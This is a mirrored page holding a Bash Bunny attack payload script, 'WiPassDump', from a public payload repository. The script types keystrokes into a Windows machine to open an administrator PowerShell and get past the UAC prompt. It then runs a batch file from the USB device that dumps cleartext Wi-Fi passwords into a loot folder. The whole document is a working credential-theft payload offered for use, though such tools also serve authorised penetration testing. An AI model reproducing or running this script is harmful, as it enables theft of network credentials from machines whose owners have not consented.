mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
57 lines
922 B
Bash
57 lines
922 B
Bash
#!/bin/bash
|
|
#
|
|
# Title: WiPassDump
|
|
# Author: samdeg555
|
|
# Version: 1.0
|
|
# Target: Windows
|
|
#
|
|
# Runs powershell as Administrator
|
|
# Bypasses UAC
|
|
# Dumps cleartext Wi-Fi passwords and infos to the Bash Bunny
|
|
#
|
|
|
|
LED R 200
|
|
|
|
# Create directory to dump infos
|
|
mkdir -p /root/udisk/loot/WiPassDump
|
|
|
|
# Source bunny_helpers.sh to get environment variable SWITCH_POSITION
|
|
source bunny_helpers.sh
|
|
|
|
# Set language accordingly
|
|
Q SET_LANGUAGE ca
|
|
|
|
ATTACKMODE HID STORAGE
|
|
|
|
LED B 200
|
|
|
|
# Launch powershell as admin
|
|
Q GUI r
|
|
Q DELAY 100
|
|
Q STRING powershell Start-Process powershell -Verb runAs
|
|
Q ENTER
|
|
|
|
# Bypass UAC
|
|
Q DELAY 3000
|
|
Q ALT o
|
|
Q ENTER
|
|
Q DELAY 500
|
|
|
|
# Start a.cmd
|
|
Q STRING '.((gwmi win32_volume -f '"'"'label='"''"'BashBunny'"'''"').Name+'"'"'payloads/'
|
|
Q STRING $SWITCH_POSITION
|
|
Q STRING '/a.cmd'"'"')'
|
|
Q ENTER
|
|
|
|
# Wait for a.cmd to finish and exit
|
|
|
|
LED R B 500
|
|
|
|
Q DELAY 3000
|
|
Q STRING exit
|
|
Q ENTER
|
|
|
|
sync
|
|
|
|
LED G
|